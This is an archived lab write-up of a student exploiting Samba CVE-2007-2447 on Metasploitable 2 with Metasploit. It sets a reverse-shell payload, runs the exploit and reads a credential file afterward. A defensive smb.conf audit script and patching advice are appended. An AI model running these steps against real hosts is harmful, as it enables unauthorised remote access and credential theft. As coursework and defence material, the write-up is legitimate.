Associated vulnerability
Title:
Samba MS-RPC Shell Command Injection Vulnerability
(CVE-2007-2447)
Description: Samba is a free software suite developed by the Samba Team that lets UNIX-like operating systems interoperate with Microsoft Windows operating systems over the SMB/CIFS network protocol. It supports sharing printers and transferring data files between systems. Samba has an input validation vulnerability when processing user data, and a remote attacker could exploit it to execute arbitrary commands on the server. The Samba code responsible for updating user passwords in the SAM database passes user input to /bin/sh without filtering. If malicious input is submitted through an MS-RPC call to /bin/sh when an external script defined in smb.conf is invoked, an attacker could be allowed, with the privileges of the nobody user, to
Introduction
# SMB-PenTest-Exploiting-CVE-2007-2447-on-Metasploitable-2
<table>
<tr>
<td><h1>RedTeam-SMB-PenTest</h1></td>
<td>
<p align="right">
<img src="https://raw.githubusercontent.com/devicons/devicon/master/icons/linux/linux-original.svg" alt="linux" width="60" height="60"/>
<img src="https://raw.githubusercontent.com/devicons/devicon/master/icons/bash/bash-original.svg" alt="bash" width="60" height="60"/>
</p>
</td>
</tr>
</table>
<h2>Description</h2>
<br/> This project documents my penetration testing engagement as part of the CMIT 386 course at UMGC. It focuses on exploiting the Samba SMB usermap_script vulnerability (CVE-2007-2447) on Metasploitable 2 using Metasploit from a Kali Linux attack VM. This proof of concept shows how a legacy vulnerability can lead to full system compromise, credential theft, and data exfiltration.
<h2>Vulnerability Overview</h2>
The vulnerability resides in the Samba service on port 445, where improper input handling in the username map script allows unauthenticated remote command execution. This provides attackers with root-level shell access if exploited.
<h2>Environment</h2>
| **Component** | **Details** |
|------------------|--------------------------------------------------|
| **Attacker VM** | Kali Linux |
| **Victim VM** | Metasploitable 2 |
| **Target Port** | 445 (Samba/SMB) |
| **Exploit Used** | `exploit/multi/samba/usermap_script` |
| **Credential Target** | `/redteam7/student3/mypass.txt` |
<h2>Steps to follow</h2>
### <u>1. Launch Metasploit:</u>
```bash
msfconsole
```
<br/> Make sure both the attacker host and victim machine are booted and running. <br/>
<img src="https://github.com/user-attachments/assets/24df295a-c6ee-4870-be98-6183771a5acc"/>
### <u>2. Search for the exploit:</u>
```bash
search samba
```
<img src="https://github.com/user-attachments/assets/529b024c-8c36-434d-a64c-a4992fe8d31d"/>
### <u>3. Use the appropriate module:</u>
```bash
use exploit/multi/samba/usermap_script
```
### <u>4. Set required options:</u>
```bash
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse
```
<img src="https://github.com/user-attachments/assets/f529b7fd-23b9-4c9a-88f8-958330048864"/>
### <u>5. Execute the exploit:</u>
```bash
exploit
```
<img src="https://github.com/user-attachments/assets/f35ec488-12bd-42c4-b514-f2080a608c63"/>
### <u>6. Post-exploitation commands:</u>
```bash
whoami
hostname
cd /redteam7/student3
cat mypass.txt
```
<img src="https://github.com/user-attachments/assets/7315c711-5795-409a-a5fe-68284239b1f3"/>
<h2>Reset Instructions</h2>
If the session hangs or breaks:
### <u>Reset Metasploit:</u>
```bash
# Leave the current shell: press Ctrl+C, then exit
exit
# Kill all open sessions and background jobs
sessions -K
jobs -K
# Restart Metasploit
msfconsole
```
<img src="https://github.com/user-attachments/assets/8f902b6c-0ed5-4dff-bb67-76308f33dc44"/>
### Key Takeaways
- Legacy services like Samba 3.0.20 with `usermap_script` are highly vulnerable.
- Exploiting this SMB vulnerability grants root shell access.
- Critical data can be harvested with simple commands, demonstrating real-world risk.
- This proves the necessity of patching, segmentation, and reducing service exposure.
### Recommendations
- Patch or decommission legacy systems immediately.
- Implement strict network segmentation and firewall rules.
- Limit SMB exposure to internal, authenticated users only.
- Monitor logs for suspicious activity and lateral movement.
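To make the recommendations above checkable, here is a small smb.conf audit (added example, not part of the original write-up or of Samba itself). It parses a constructed sample configuration, flags the `username map script` directive that CVE-2007-2447 abuses on Samba 3.0.0 through 3.0.25rc3, and reports a missing `hosts allow` restriction; the function names and the sample file are my own.

```python
import re
from typing import Dict, List

# Constructed sample smb.conf resembling a legacy Samba 3.0.x setup (not taken from the page).
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba %v)
   username map script = /etc/samba/scripts/mapusers.sh
   security = user

[tmp]
   path = /tmp
   writeable = yes
"""


def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse smb.conf into {section: {param: value}}.

    Samba ignores case and whitespace in parameter names, so
    'username map script' and 'UserNameMapScript' are the same key;
    we normalise the same way to avoid missing an obfuscated spelling.
    """
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.match(r"\[(.+)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        sections[current][re.sub(r"\s+", "", key).lower()] = value.strip()
    return sections


def audit_smb_conf(text: str) -> List[str]:
    """Return defender-relevant findings for CVE-2007-2447 exposure."""
    g = parse_smb_conf(text).get("global", {})
    findings: List[str] = []
    if "usernamemapscript" in g:
        findings.append(
            f"username map script is set ({g['usernamemapscript']}): on Samba "
            "3.0.0-3.0.25rc3 the client-supplied username reaches /bin/sh "
            "unescaped (CVE-2007-2447); remove the directive or upgrade Samba")
    if "hostsallow" not in g:
        findings.append("no 'hosts allow' in [global]: SMB is reachable from any address")
    return findings


if __name__ == "__main__":
    for finding in audit_smb_conf(SAMPLE_SMB_CONF):
        print("FINDING:", finding)
```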
### References
- [Metasploit Samba usermap_script](https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script/)
- [CVE-2007-2447 Details](https://nvd.nist.gov/vuln/detail/CVE-2007-2447)
- [Metasploitable 2 Exploit Index](https://docs.rapid7.com/metasploit/metasploitable-2/)
File snapshot
[4.0K] /data/pocs/ceb48a9c7a8625766a9b92a51c0b2a2d8571f10e
└── [3.9K] README.md
0 directories, 1 file
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.